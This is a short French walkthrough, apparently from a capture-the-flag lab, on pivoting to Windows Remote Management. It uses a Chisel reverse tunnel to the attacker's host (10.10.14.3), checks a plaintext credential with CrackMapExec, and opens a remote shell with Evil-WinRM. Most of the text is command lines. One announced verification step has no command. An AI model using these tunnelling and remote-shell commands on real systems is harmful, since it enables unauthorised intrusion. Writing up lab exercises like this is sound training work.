Pivoting Port Forwarding (5985 WinRM)

Chisel

Téléchargement et préparation des fichiers : Nous avons téléchargé les fichiers Chisel compressés, à savoir :

chisel-linux
chisel-windows.exe

https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gzgithub.com

https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gzgithub.com

Après les avoir extraits, nous avons transféré le fichier Chisel pour Windows vers la machine cible :

copy \\10.10.14.3\smb\chisel-windows.exe chisel-windows.exe

Mise en écoute sur la machine attaquante avec Chisel : Nous avons lancé Chisel en mode serveur sur la machine attaquante sur le port 8888 :

./chisel-linux server -p 8888 -reverse

Ensuite, sur la machine Windows cible, nous avons exécuté Chisel en mode client pour nous connecter à notre machine attaquante et rediriger le port 5985 vers notre machine :

chisel-windows.exe client 10.10.14.3:8888 R:5985:127.0.0.1:5985

Vérification du port redirigé avec lsof : Nous avons vérifié que le port 5985 était bien en écoute après la redirection avec la commande :

Connexion avec WinRM : Nous avons utilisé CrackMapExec pour tester la connexion via WinRM sur le port 5985 redirigé :

crackmapexec winrm 10.10.14.3 -u 'Chris' -p '36mEAhz/B8xQ~2VM'

Nous avons obtenu le symbole pwned, confirmant que nous avions réussi à accéder à la machine via WinRM.

Connexion finale avec Evil-WinRM : Enfin, nous avons utilisé Evil-WinRM pour obtenir un shell à distance en tant que Chris :

evil-winrm -i 10.10.14.3 -u 'Chris' -p '36mEAhz/B8xQ~2VM'

Mis à jour il y a 1 an

hashtagChisel

Chisel